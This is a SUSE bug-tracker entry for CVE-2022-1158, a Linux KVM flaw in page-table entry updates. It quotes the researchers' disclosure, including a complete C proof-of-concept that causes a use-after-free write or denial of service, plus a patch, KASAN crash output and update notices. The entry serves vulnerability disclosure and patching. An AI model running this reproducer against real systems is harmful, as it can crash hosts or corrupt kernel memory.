Bugzilla – Bug 1197660
VUL-0: CVE-2022-1158: kernel-source: cmpxchg_gpte mishandles VM_IO|VM_PFNMAP page
Last modified: 2024-06-25 16:44:16 UTC
From linux-distros private ML ----------------------------- We may find a flaw in the kvm module that can lead to UAF write or DoS. This flaw was introduced in Linux in v5.2 [4]. We would appreciate a CVE ID if this is a security issue. -- [ Description When the KVM updates the guest's page table entry [1], it will first use get_user_pages_fast() [2] to pin the page, and when it fails (e.g. the vma->flags has VM_IO or VM_PFNMAP [3]), it will get corresponding VMA where the page lies in through find_vma_intersection(), calculate the physical address, and map the page to the kernel virtual address through memremap(), and finally, write the update: ```c vma = find_vma_intersection(current->mm, vaddr, vaddr + PAGE_SIZE); if (!vma || !(vma->vm_flags & VM_PFNMAP)) { mmap_read_unlock(current->mm); return -EFAULT; } pfn = ((vaddr - vma->vm_start) >> PAGE_SHIFT) + vma->vm_pgoff; paddr = pfn << PAGE_SHIFT; table = memremap(paddr, PAGE_SIZE, MEMREMAP_WB); if (!table) { mmap_read_unlock(current->mm); return -EFAULT; } ret = CMPXCHG(&table[index], orig_pte, new_pte); ``` The problem is that when we get the vma through find_vma_intersection(), only VM_PFNMAP [4] is checked, not both VM_IO and VM_PFNMAP. In the reproducer below, after the KVM_SET_USER_MEMORY_REGION is completed, we replace the guest's memory mapping with the kernel-user shared region of io_uring [5] and then perform the KVM_TRANSLATE operation, which finally triggers the page table entry update. Now, memremap() will return page_offset_base (direct mapping of all physical memory) + vaddr (the linear address of KVM_TRANSLATE) + vm_pgoff (the offset when io_uring performs mmap(2)), and use the return value as the base address for CMPXCHG (write 0x21 in this case). Since both vaddr and vm_pgoff are controllable by the user-mode process, writing may exceed the previously mapped guest memory space and trigger exceptions such as UAF. The vulnerability shares similarities with CVE-2021-22543 [6]. -- [ Reproducer Environment (see attachment for Linux compilation configuration): Ubuntu 21.10 on Linux 5.13 QEMU 6.0.0: qemu-system-x86_64 -snapshot -m 4096 -smp 1 -display none -serial stdio \ -enable-kvm -cpu host -device e1000,netdev=net0 \ -netdev user,id=net0,hostfwd=tcp:127.0.0.1:4445-:22 -drive \ file=/home/qiuhao/hack/image/bullseye.img,format=raw -kernel \ /home/qiuhao/hack/linux/arch/x86/boot/bzImage \ -append "root=/dev/sda console=ttyS0 earlyprintk=serial" PoC.c (run in QEMU): ```c /* * Tested on Linux v5.17 and 1930a6e739c (March 28, 2022) with Debian 11 * Leads to KASAN UAF write exception and DoS (endless page walking) */ #include <fcntl.h> #include <linux/io_uring.h> #include <linux/kvm.h> #include <stdint.h> #include <string.h> #include <sys/ioctl.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/types.h> #include <unistd.h> void io_uring_setup(uint32_t entries, struct io_uring_params* setup_params, void* vma2) { uint32_t fd_io_uring = syscall(__NR_io_uring_setup, entries, setup_params); mmap(vma2, setup_params->sq_entries * sizeof(struct io_uring_sqe), PROT_READ | PROT_WRITE, MAP_SHARED | MAP_POPULATE | MAP_FIXED, fd_io_uring, IORING_OFF_SQES); } void kvm_setup_user_mem(const int vm_fd, char* const host_mem) { struct kvm_userspace_memory_region memreg = {.slot = 0, .guest_phys_addr = 0}; memreg.memory_size = 4096; memreg.userspace_addr = (uintptr_t)host_mem; ioctl(vm_fd, KVM_SET_USER_MEMORY_REGION, &memreg); } int main(void) { mmap((void*)0x20000000, 0x1000000, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED | MAP_FIXED, -1, 0); memset((void*)0x20000000, 0, 0x1000000); int kvm_fd = open("/dev/kvm", O_RDWR | O_CLOEXEC); int vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, (unsigned long)0); int vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, (unsigned long)0); kvm_setup_user_mem(vm_fd, (char*)0x20fe5000); // guest's mem: 0x20fe5000 - 0x20fe6000, 4k uint32_t entries = 64 * 0x200; // size: 4k * 0x200 struct io_uring_params io_uring_params = {.flags = 0}; io_uring_setup(entries, &io_uring_params, (void*)0x20fe0000 /* mmap(vma2 ~ vma2 + entries*size) overlap with guest's mem */); // Write address: ffff888000000000 + IORING_OFF_SQES + (GUEST_MEM_ADDRESS - vma2) <--- // ffff888000000000 + IORING_OFF_SQES / 2 + (GUEST_MEM_ADDRESS - vma2) // ffff888000000000 + (GUEST_MEM_ADDRESS - vma2) memset((void*)0x20000000, 0, 0x1000000); uint64_t* tmp = (uint64_t*)(0x20fe5000); *tmp = 1; // Page Directory Base Register = 0 (points to it self). Page Table Entry: Present = 1. struct kvm_sregs kvm_sregs = {.cr0 = 0x80000000}; // PG: enable paging and use the CR3 register, CR3 = 0 ioctl(vcpu_fd, KVM_SET_SREGS, &kvm_sregs); struct kvm_translation kvm_translation = {.linear_address = 0x0 /* betweeen 0 ~ 4k*/}; ioctl(vcpu_fd, KVM_TRANSLATE, &kvm_translation); } ``` -- [ Mitigation An ad-hoc patch is to add VM_IO check: ```patch From a29b2de6294e4b2a8e0d6d592a75b1ef88d2a8ef Mon Sep 17 00:00:00 2001 From: Qiuhao Li <qiuhao@sysec.org> Date: Tue, 29 Mar 2022 20:07:12 +0800 Subject: [PATCH] x86/KVM: fix KVM VM_IO|VM_PFNMAP vma mishandling This is an ad-hoc fix to handle the VM_IO|VM_PFNMAP page when we update the guest page table entry. Reported-by: Qiuhao Li <qiuhao@sysec.org>, Gaoning Pan <pgn@zju.edu.cn>, Yongkang Jia <kangel@zju.edu.cn> Fixes: bd53cb35a ("X86/KVM: Handle PFNs outside of kernel reach when touching GPTEs") Signed-off-by: Qiuhao Li <qiuhao@sysec.org> --- arch/x86/kvm/mmu/paging_tmpl.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/arch/x86/kvm/mmu/paging_tmpl.h b/arch/x86/kvm/mmu/paging_tmpl.h index 252c77805eb9..0e4379ab6055 100644 --- a/arch/x86/kvm/mmu/paging_tmpl.h +++ b/arch/x86/kvm/mmu/paging_tmpl.h @@ -167,7 +167,7 @@ static int FNAME(cmpxchg_gpte)(struct kvm_vcpu *vcpu, struct kvm_mmu *mmu, mmap_read_lock(current->mm); vma = find_vma_intersection(current->mm, vaddr, vaddr + PAGE_SIZE); - if (!vma !(vma->vm_flags & VM_PFNMAP)) { + if (!vma (vma->vm_flags & VM_IO) || !(vma->vm_flags & VM_PFNMAP)) { mmap_read_unlock(current->mm); return -EFAULT; } -- 2.32.0 ``` -- [ Credits Qiuhao Li (Harbin Institute of Technology) Gaoning Pan (Zhejiang University) Yongkang Jia (Zhejiang University) -- [References [1] https://github.com/torvalds/linux/blob/1930a6e739c4b4a654a69164dbe39e554d228915/arch/x86/kvm/mmu/paging_tmpl.h#L146 [2] https://github.com/torvalds/linux/blob/1930a6e739c4b4a654a69164dbe39e554d228915/mm/gup.c#L2828 [3] https://github.com/torvalds/linux/blob/1930a6e739c4b4a654a69164dbe39e554d228915/mm/gup.c#L913 [4] https://github.com/torvalds/linux/commit/bd53cb35a3e9adb73a834a36586e9ad80e877767 [5] https://kernel.dk/io_uring.pdf [6] https://github.com/google/security-research/security/advisories/GHSA-7wq5-phmq-m584 [7] KASAN Output [ 179.214881] BUG: KASAN: use-after-free in paging32_walk_addr_generic+0xb99/0xd40 [ 179.215485] Write of size 4 at addr ffff888010005000 by task a.out/219 [ 179.216011] [ 179.216143] CPU: 0 PID: 219 Comm: a.out Not tainted 5.17.0-12882-g1930a6e739c4 #14 [ 179.216744] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 [ 179.217419] Call Trace: [ 179.217622] <TASK> [ 179.217798] dump_stack_lvl+0x34/0x44 [ 179.218097] print_report.cold+0x5e/0x5db [ 179.218422] ? paging32_walk_addr_generic+0xb99/0xd40 [ 179.218824] kasan_report+0xab/0x120 [ 179.219119] ? vmacache_find+0x31/0x100 [ 179.219413] ? paging32_walk_addr_generic+0xb99/0xd40 [ 179.219817] kasan_check_range+0xf5/0x1d0 [ 179.220156] paging32_walk_addr_generic+0xb99/0xd40 [ 179.220555] ? validate_direct_spte+0x180/0x180 [ 179.220923] ? vmx_vcpu_pi_load+0x1e7/0x310 [ 179.221268] ? reset_guest_paging_metadata+0x163/0x210 [ 179.221685] paging32_gva_to_gpa+0x85/0x130 [ 179.222026] ? paging32_walk_addr_generic+0xd40/0xd40 [ 179.222441] ? vmx_vcpu_pi_put+0x19/0x50 [ 179.222760] ? kvm_arch_vcpu_load+0x181/0x360 [ 179.223112] ? mutex_lock_killable+0x89/0xe0 [ 179.223462] kvm_arch_vcpu_ioctl_translate+0x6e/0xf0 [ 179.223868] kvm_vcpu_ioctl+0x66e/0x850 [ 179.224167] ? kvm_vcpu_kick+0x140/0x140 [ 179.224469] ? faultin_vma_page_range+0x80/0x80 [ 179.224803] ? vm_mmap_pgoff+0x184/0x1e0 [ 179.225105] ? randomize_stack_top+0x80/0x80 [ 179.225735] ? __fget_light+0x1be/0x200 [ 179.226278] __x64_sys_ioctl+0xb1/0xf0 [ 179.226775] do_syscall_64+0x38/0x90 [ 179.227212] entry_SYSCALL_64_after_hwframe+0x44/0xae [ 179.227705] RIP: 0033:0x7f5f5382bcc7 [ 179.228006] Code: 00 00 00 48 8b 05 c9 91 0c 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 99 91 0c 00 f7 d8 64 89 01 48 [ 179.229502] RSP: 002b:00007ffdb621d0b8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010 [ 179.230116] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5f5382bcc7 [ 179.230702] RDX: 00007ffdb621d0c0 RSI: 00000000c018ae85 RDI: 0000000000000005 [ 179.231273] RBP: 00007ffdb621d2b0 R08: 0000000000000006 R09: 0000000010000000 [ 179.231849] R10: 0000000000008011 R11: 0000000000000217 R12: 0000556365475090 [ 179.232449] R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 [ 179.233033] </TASK> [ 179.233216] [ 179.233344] The buggy address belongs to the physical page: [ 179.233791] page:00000000bcf08151 refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x10005 [ 179.234545] flags: 0x100000000000000(node=0|zone=1) [ 179.234946] raw: 0100000000000000 ffffea0000400148 ffffea0000400148 0000000000000000 [ 179.235565] raw: 0000000000000000 0000000000000000 00000000ffffffff 0000000000000000 [ 179.236201] page dumped because: kasan: bad access detected [ 179.236647] [ 179.236773] Memory state around the buggy address: [ 179.237162] ffff888010004f00: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 179.237743] ffff888010004f80: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 179.238321] >ffff888010005000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 179.238902] ^ [ 179.239184] ffff888010005080: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 179.239756] ffff888010005100: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff [ 179.240447] ================================================================== [ 179.241366] Disabling lock debugging due to kernel taint Best Regards, Qiuhao Li
Created attachment 857485 [details] kconfig
The FNAME function is in arch/x86/kvm/mmu/paging_tmpl.h for stable and SLE15-SP4{,-GA} branches. On older branches it is located in arch/x86/kvm/paging_tmpl.h except for cve/linux-2.6.32 (where was not yet implemented), so SLE-11* products are safe. Tracking as affected: - stable - SLE15-SP4 - SLE15-SP4-GA not sure (need kernel folks feedback): - SLE12-SP5 - SLE15-SP3 - cve/linux-3.0 - cve/linux-4.4 - cve/linux-4.12 - cve/linux-5.4
Public: https://www.openwall.com/lists/oss-security/2022/04/08/4
Did backports of the fix to cve/linux-5.3 and SLE15-SP4-GA. Some changes to the inline assembly were needed so the change needs some review/testing before I can push it. Checked the master and stable branches, both already contain the fix. cve/linux-4.12 and older are note affected.
All changes merged. Assigning back.
SUSE-SU-2022:1669-1: An update that solves 16 vulnerabilities, contains 6 features and has 29 fixes is now available. Category: security (important) Bug References: 1028340,1071995,1137728,1152472,1152489,1177028,1179878,1182073,1183723,1187055,1191647,1193556,1193842,1194625,1195651,1195926,1196018,1196114,1196367,1196514,1196639,1196942,1197157,1197391,1197656,1197660,1197677,1197914,1197926,1198077,1198217,1198330,1198400,1198413,1198437,1198448,1198484,1198515,1198516,1198534,1198742,1198825,1198989,1199012,1199024 CVE References: CVE-2020-27835,CVE-2021-0707,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-4154,CVE-2022-0812,CVE-2022-1158,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748,CVE-2022-28893,CVE-2022-29156 JIRA References: SLE-13208,SLE-13513,SLE-15172,SLE-15175,SLE-18234,SLE-8449 Sources used: SUSE Linux Enterprise Realtime Extension 15-SP3 (src): release-notes-sle_rt-15.3.20220422-150300.3.3.2 SUSE Linux Enterprise Module for Realtime 15-SP3 (src): kernel-rt-5.3.18-150300.88.2, kernel-rt_debug-5.3.18-150300.88.2, kernel-source-rt-5.3.18-150300.88.2, kernel-syms-rt-5.3.18-150300.88.1, release-notes-sle_rt-15.3.20220422-150300.3.3.2 SUSE Linux Enterprise Micro 5.2 (src): kernel-rt-5.3.18-150300.88.2 SUSE Linux Enterprise Micro 5.1 (src): kernel-rt-5.3.18-150300.88.2 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2022:1676-1: An update that solves 16 vulnerabilities, contains 6 features and has 25 fixes is now available. Category: security (important) Bug References: 1028340,1065729,1071995,1121726,1137728,1152489,1177028,1179878,1182073,1183723,1187055,1191647,1193556,1193842,1195926,1196018,1196114,1196367,1196514,1196639,1196942,1197157,1197391,1197656,1197660,1197914,1197926,1198217,1198330,1198400,1198413,1198437,1198448,1198484,1198515,1198516,1198660,1198742,1198825,1199012,1199024 CVE References: CVE-2020-27835,CVE-2021-0707,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-4154,CVE-2022-0812,CVE-2022-1158,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748,CVE-2022-28893,CVE-2022-29156 JIRA References: SLE-13208,SLE-13513,SLE-15172,SLE-15175,SLE-15176,SLE-8449 Sources used: openSUSE Leap 15.3 (src): kernel-azure-5.3.18-150300.38.56.1, kernel-source-azure-5.3.18-150300.38.56.1, kernel-syms-azure-5.3.18-150300.38.56.1 SUSE Linux Enterprise Module for Public Cloud 15-SP3 (src): kernel-azure-5.3.18-150300.38.56.1, kernel-source-azure-5.3.18-150300.38.56.1, kernel-syms-azure-5.3.18-150300.38.56.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2022:1687-1: An update that solves 16 vulnerabilities, contains 6 features and has 29 fixes is now available. Category: security (important) Bug References: 1028340,1071995,1137728,1152472,1152489,1177028,1179878,1182073,1183723,1187055,1191647,1193556,1193842,1194625,1195651,1195926,1196018,1196114,1196367,1196514,1196639,1196942,1197157,1197391,1197656,1197660,1197677,1197914,1197926,1198077,1198217,1198330,1198400,1198413,1198437,1198448,1198484,1198515,1198516,1198534,1198742,1198825,1198989,1199012,1199024 CVE References: CVE-2020-27835,CVE-2021-0707,CVE-2021-20292,CVE-2021-20321,CVE-2021-38208,CVE-2021-4154,CVE-2022-0812,CVE-2022-1158,CVE-2022-1280,CVE-2022-1353,CVE-2022-1419,CVE-2022-1516,CVE-2022-28356,CVE-2022-28748,CVE-2022-28893,CVE-2022-29156 JIRA References: SLE-13208,SLE-13513,SLE-15172,SLE-15175,SLE-18234,SLE-8449 Sources used: openSUSE Leap 15.4 (src): dtb-aarch64-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1 openSUSE Leap 15.3 (src): dtb-aarch64-5.3.18-150300.59.68.1, kernel-64kb-5.3.18-150300.59.68.1, kernel-debug-5.3.18-150300.59.68.1, kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3, kernel-docs-5.3.18-150300.59.68.1, kernel-kvmsmall-5.3.18-150300.59.68.1, kernel-obs-build-5.3.18-150300.59.68.1, kernel-obs-qa-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1, kernel-source-5.3.18-150300.59.68.1, kernel-syms-5.3.18-150300.59.68.1, kernel-zfcpdump-5.3.18-150300.59.68.1 SUSE Linux Enterprise Workstation Extension 15-SP3 (src): kernel-default-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1 SUSE Linux Enterprise Module for Live Patching 15-SP3 (src): kernel-default-5.3.18-150300.59.68.1, kernel-livepatch-SLE15-SP3_Update_18-1-150300.7.5.1 SUSE Linux Enterprise Module for Legacy Software 15-SP3 (src): kernel-default-5.3.18-150300.59.68.1 SUSE Linux Enterprise Module for Development Tools 15-SP3 (src): kernel-docs-5.3.18-150300.59.68.1, kernel-obs-build-5.3.18-150300.59.68.1, kernel-preempt-5.3.18-150300.59.68.1, kernel-source-5.3.18-150300.59.68.1, kernel-syms-5.3.18-150300.59.68.1 SUSE Linux Enterprise Module for Basesystem 15-SP3 (src): kernel-64kb-5.3.18-150300.59.68.1, kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3, kernel-preempt-5.3.18-150300.59.68.1, kernel-source-5.3.18-150300.59.68.1, kernel-zfcpdump-5.3.18-150300.59.68.1 SUSE Linux Enterprise Micro 5.2 (src): kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3 SUSE Linux Enterprise Micro 5.1 (src): kernel-default-5.3.18-150300.59.68.1, kernel-default-base-5.3.18-150300.59.68.1.150300.18.41.3 SUSE Linux Enterprise High Availability 15-SP3 (src): kernel-default-5.3.18-150300.59.68.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
SUSE-SU-2022:2104-1: An update that solves 23 vulnerabilities, contains one feature and has 19 fixes is now available. Category: security (important) Bug References: 1028340,1065729,1071995,1158266,1177282,1191647,1195651,1195926,1196114,1196367,1196426,1196433,1196514,1196570,1196942,1197157,1197343,1197472,1197656,1197660,1197895,1198330,1198400,1198484,1198516,1198577,1198660,1198687,1198778,1198825,1199012,1199063,1199314,1199505,1199507,1199605,1199650,1199918,1200015,1200143,1200144,1200249 CVE References: CVE-2019-19377,CVE-2020-26541,CVE-2021-20321,CVE-2021-33061,CVE-2022-0168,CVE-2022-1011,CVE-2022-1158,CVE-2022-1184,CVE-2022-1353,CVE-2022-1516,CVE-2022-1652,CVE-2022-1729,CVE-2022-1734,CVE-2022-1966,CVE-2022-1974,CVE-2022-1975,CVE-2022-21123,CVE-2022-21125,CVE-2022-21127,CVE-2022-21166,CVE-2022-21180,CVE-2022-28893,CVE-2022-30594 JIRA References: SLE-18234 Sources used: SUSE Manager Server 4.1 (src): kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1 SUSE Manager Retail Branch Server 4.1 (src): kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1 SUSE Manager Proxy 4.1 (src): kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1 SUSE Linux Enterprise Server for SAP 15-SP2 (src): kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1 SUSE Linux Enterprise Server 15-SP2-LTSS (src): kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1 SUSE Linux Enterprise Server 15-SP2-BCL (src): kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1 SUSE Linux Enterprise Module for Live Patching 15-SP2 (src): kernel-default-5.3.18-150200.24.115.1, kernel-livepatch-SLE15-SP2_Update_27-1-150200.5.3.1 SUSE Linux Enterprise High Performance Computing 15-SP2-LTSS (src): kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1 SUSE Linux Enterprise High Performance Computing 15-SP2-ESPOS (src): kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1 SUSE Linux Enterprise High Availability 15-SP2 (src): kernel-default-5.3.18-150200.24.115.1 SUSE Enterprise Storage 7 (src): kernel-default-5.3.18-150200.24.115.1, kernel-default-base-5.3.18-150200.24.115.1.150200.9.54.1, kernel-docs-5.3.18-150200.24.115.1, kernel-obs-build-5.3.18-150200.24.115.1, kernel-preempt-5.3.18-150200.24.115.1, kernel-source-5.3.18-150200.24.115.1, kernel-syms-5.3.18-150200.24.115.1 NOTE: This line indicates an update has been released for the listed product(s). At times this might be only a partial fix. If you have questions please reach out to maintenance coordination.
released